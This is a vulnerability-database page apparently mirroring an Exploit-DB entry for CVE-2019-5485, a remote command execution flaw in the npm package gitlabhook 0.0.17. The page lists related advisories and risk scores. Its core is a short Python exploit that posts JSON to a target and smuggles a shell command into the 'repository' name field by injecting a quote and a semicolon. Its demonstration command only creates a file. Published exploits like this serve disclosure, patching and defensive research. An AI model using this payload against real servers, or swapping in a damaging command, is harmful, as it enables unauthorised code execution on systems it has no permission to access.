Lucene search
K

NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution

🗓️ 25 Sep 2019 00:00:00Reported by Semen Alexandrovich LyhinType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 145 Views

NPMJS gitlabhook 0.0.17 'repository' Remote Command Execution CVE-2019-548

Related
Code
ReporterTitlePublishedViews
Family
0day.today
NPMJS gitlabhook 0.0.17 - (repository) Remote Command Execution Exploit
26 Sep 201900:00
zdt
Circl
CVE-2019-5485
21 Sep 202104:41
circl
CVE
CVE-2019-5485
13 Sep 201917:30
cve
Cvelist
CVE-2019-5485
13 Sep 201917:30
cvelist
exploitpack
NPMJS gitlabhook 0.0.17 - repository Remote Command Execution
25 Sep 201900:00
exploitpack
Github Security Blog
Command Injection in gitlabhook
16 Sep 201922:24
github
Hacker One
Node.js third-party modules: gitlabhook OS Command Injection
31 Aug 201909:18
hackerone
Node.js
Command Injection
17 Sep 201920:56
nodejs
NVD
CVE-2019-5485
13 Sep 201918:15
nvd
OSV
CVE-2019-5485
13 Sep 201918:15
osv
Rows per page
# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10. 
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Sep 2019 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 3.110
CVSS 210
EPSS0.49627
145